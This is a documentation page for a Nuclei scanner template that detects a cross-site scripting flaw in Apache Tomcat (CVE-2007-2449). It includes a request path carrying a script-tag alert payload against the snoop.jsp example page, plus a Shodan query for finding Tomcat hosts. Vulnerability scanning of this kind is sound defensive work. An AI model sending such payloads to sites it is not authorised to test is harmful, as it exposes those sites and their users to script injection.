Apache Tomcat 4.x-7.x - Cross-Site Scripting
ID: CVE-2007-2449
Severity: medium
Author: pdteam,ritikchaddha
Tags: cve,cve2007,apache,misconfig,tomcat,xss
Description
Section titled “Description”Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.
YAML Source
Section titled “YAML Source”id: CVE-2007-2449
info: name: Apache Tomcat 4.x-7.x - Cross-Site Scripting author: pdteam,ritikchaddha severity: medium description: | Apache Tomcat 4.x through 7.x contains a cross-site scripting vulnerability which an attacker can use to execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. reference: - https://vulners.com/securityvulns/SECURITYVULNS:DOC:17267 - https://nvd.nist.gov/vuln/detail/CVE-2007-2449 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 7.2 cwe-id: CWE-79 metadata: max-request: 1 verified: true shodan-query: title:"Apache Tomcat" tags: cve,cve2007,apache,misconfig,tomcat,xss
http: - method: GET path: - "{{BaseURL}}/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp"
matchers-condition: and matchers: - type: word part: body words: - 'Request URI: /examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp' - 'JSP Request Method' condition: and
- type: word part: content_type words: - text/html
- type: status status: - 200# digest: 490a0046304402207aa82e86e579971f8779ff21649e34c827eb21246f5e6ab750b8ed8ee2b252f202202f87ae291c8a27943b32aacd491275a0cf58a6fa530d278108abf696b11ed75e:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2007/CVE-2007-2449.yaml"